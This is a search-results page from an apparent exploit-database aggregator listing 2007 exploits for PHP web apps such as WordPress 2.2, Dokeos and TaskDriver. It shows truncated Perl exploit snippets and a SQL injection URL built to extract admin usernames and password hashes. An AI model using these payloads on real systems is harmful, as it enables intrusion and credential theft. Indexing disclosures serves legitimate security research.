Lucene search
+L

1507 matches found

exploitpack
exploitpack
added 2007/07/01 12:0 a.m.20 views

phpEventCalendar 0.2.3 - eventdisplay.php SQL Injection

phpEventCalendar 0.2.3 - eventdisplay.php SQL Injection !/usr/bin/perl Vendor url: www.ikemcg.com require LWP::UserAgent; print " phpEventCalendar ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "User id to retrieve name/password from? 1 = admin";...

0.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2007/07/01 12:0 a.m.38 views

phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection

!/usr/bin/perl Vendor url: www.ikemcg.com require LWP::UserAgent; print " phpEventCalendar ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "User id to retrieve name/password from? 1 = admin"; chomp$targetid=; $target .=...

7.5CVSS5.8AI score0.01228EPSS
SaveExploits2
zdt
zdt
added 2007/06/26 12:0 a.m.64 views

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Exploit for unknown platform in category web applications ======================================================== WordPress 2.2 wp-app.php Arbitrary File Upload Exploit ======================================================== ! /usr/bin/env perl Wordpress 2.2 and Wordpress MU Website :...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2007/06/26 12:0 a.m.42 views

WordPress Core 2.2 - 'wp-app.php' Arbitrary File Upload

!/usr/bin/env perl Wordpress 2.2 and Wordpress MU Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html use Digest::MD5 qwmd5hex; use LWP::UserAgent; my $ua = new LWP::UserAgent; my $blog = $ARGV0; my $user = $ARGV1; my $pass = $ARGV2; my...

5.8AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/06/20 12:0 a.m.27 views

igshop14-eval.txt

!/usr/bin/perl -w use LWP::UserAgent; iG Shop 1.4 eval Inclusion Vulnerability found by IFX nyubicrew Vulnerability on page.php if !$action $action = "make"; // here the function will be called. eval "page$action;"; die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV; $b =...

7.4AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/06/13 12:0 a.m.33 views

fuzzy-sql.txt

!/usr/bin/perl -w Fuzzylime Forum 1.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code low.php: $gettopicid = mysqlquery"SELECT FROM $tableprefixthreads WHERE threadid='$GETtopic'"; PoC:...

7.4AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/06/07 12:0 a.m.24 views

comicsense02-sql.txt

!/usr/bin/perl -w ComicSense 0.2 SQL Injection Exploit Discovered by: s0cratex Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html http://milw0rm.com/exploits/4035 Vulnerable Code index.php: $sqlQuery = "SELECT...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2007/05/23 12:0 a.m.65 views

PHPSecurityAdmin <= Remote File Include Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; / + - AYYILDIZ TEAM // AYYILDIZ.ORG + + + - PHPSecurityAdmin = Remote File Include Exploit + + + - Script name: PHPSecurityAdmin - Script site: http://sourceforge.net/projects/phpsecurityadm/ + + + - Coded by iLker Kandemir + -...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/05/23 12:0 a.m.21 views

saxon-rfi.txt

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Resear...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2007/05/23 12:0 a.m.39 views

Dokeos 1.8.0 - 'my_progress.php?course' SQL Injection

!/usr/bin/perl -w Dokeos = 1.8.0 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code myprogress.php: ifisset$GET'course' $sqlInfosCourse = "SELECT course.code, course.title,course.dbname,CONCATuser.firstname,'...

7.5CVSS5.8AI score0.01835EPSS
SaveExploits1
zdt
zdt
added 2007/05/23 12:0 a.m.44 views

Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ===================================================================== Dokeos = 1.8.0 myprogress.php course Remote SQL Injection Exploit ===================================================================== !/usr/bin/perl -w Dokeos = 1.8.0...

7.1AI score
SaveExploits0
securityvulns
securityvulns
added 2007/05/22 12:0 a.m.57 views

Simple Accessible XHTML Online News v4.6 Remote File Include Exploit

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Resear...

0.4AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/05/21 12:0 a.m.26 views

faqengine-sql.txt

!/usr/bin/perl -w FAQEngine = v4.16.03 SQL Injection Exploit Discovered by: Silentz Payload: Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code question.php: $sql = "select from ".$tableprefix."questions where publish=1 and questionref=$questionref order by enterdate...

7.4AI score
SaveExploits0
exploitpack
exploitpack
added 2007/05/10 12:0 a.m.31 views

TaskDriver 1.2 - Authentication Bypass SQL Injection

TaskDriver 1.2 - Authentication Bypass SQL Injection !/usr/bin/perl -w TaskDriver = 1.2 Login Bypass/SQL Injection Exploit Discovered by: Silentz Payload: Login Bypass & Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code login.php: $sql = "SELECT FROM $userstable WHER...

0.9AI score
SaveExploits0
Exploit DB
Exploit DB
added 2007/05/10 12:0 a.m.38 views

TaskDriver 1.2 - Authentication Bypass / SQL Injection

!/usr/bin/perl -w TaskDriver = 1.2 Login Bypass/SQL Injection Exploit Discovered by: Silentz Payload: Login Bypass & Admin Username & Hash Retrieval Website: http://www.w4ck1ng.com Vulnerable Code login.php: $sql = "SELECT FROM $userstable WHERE username = '$POSTusername' AND password =...

7.5CVSS5.8AI score0.01257EPSS
SaveExploits1
zdt
zdt
added 2007/05/09 12:0 a.m.41 views

TutorialCMS <= 1.00 (search.php search) SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================================= TutorialCMS alert'http://www.w4ck1ng.com' PoC: http://victim.com/search.php?search=' UNION SELECT 0,0,0,0,username, password,0,0,0,0,0,0,0 FROM users WHERE id='1' / Subject To:...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/05/08 12:0 a.m.30 views

phphtmllib-rfi.txt

!/usr/bin/perl use LWP::UserAgent; / + - AYYILDIZ TEAM // AYYILDIZ.ORG + + + - PHPHtmlLib mynetcom - - info: / Siz Yokken AYYILDIZ Vardi / + + + - tnx: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann And AYYILDIZ.ORG - - h0tturk.com, expw0rm.com, turkistiklal.com, evilc0der.com ! + + usage: perl exploit....

7.4AI score
SaveExploits0
exploitpack
exploitpack
added 2007/05/03 12:0 a.m.50 views

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion

PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise...

7.5AI score
SaveExploits0
seebug.org
seebug.org
added 2007/04/26 12:0 a.m.17 views

phpwind 5.0.1 SQL Injection Vulnerability Exploit

No description provided by source. 0 ? intval$argv3:1; echo "\r\nLogging\t........"; ifislogin echo "Login Ok!\r\n"; else die"Not Login!\tCheck Your Cookie and Useragent!\r\n"; echo "Testing\t........"; iftest echo "Vul!\r\n"; else di...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/04/24 12:0 a.m.29 views

MyBulletinBoard &lt;= 1.2.5 Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print " \n"; print " \n"; print " MyBulletinBoard = 1.2.5 Remote SQL Injection Exploit \n"; print " Bug found and Exploit coded by 0x86 \n"; print " &nbsp...

7.1AI score
SaveExploits0
Rows per page
Query Builder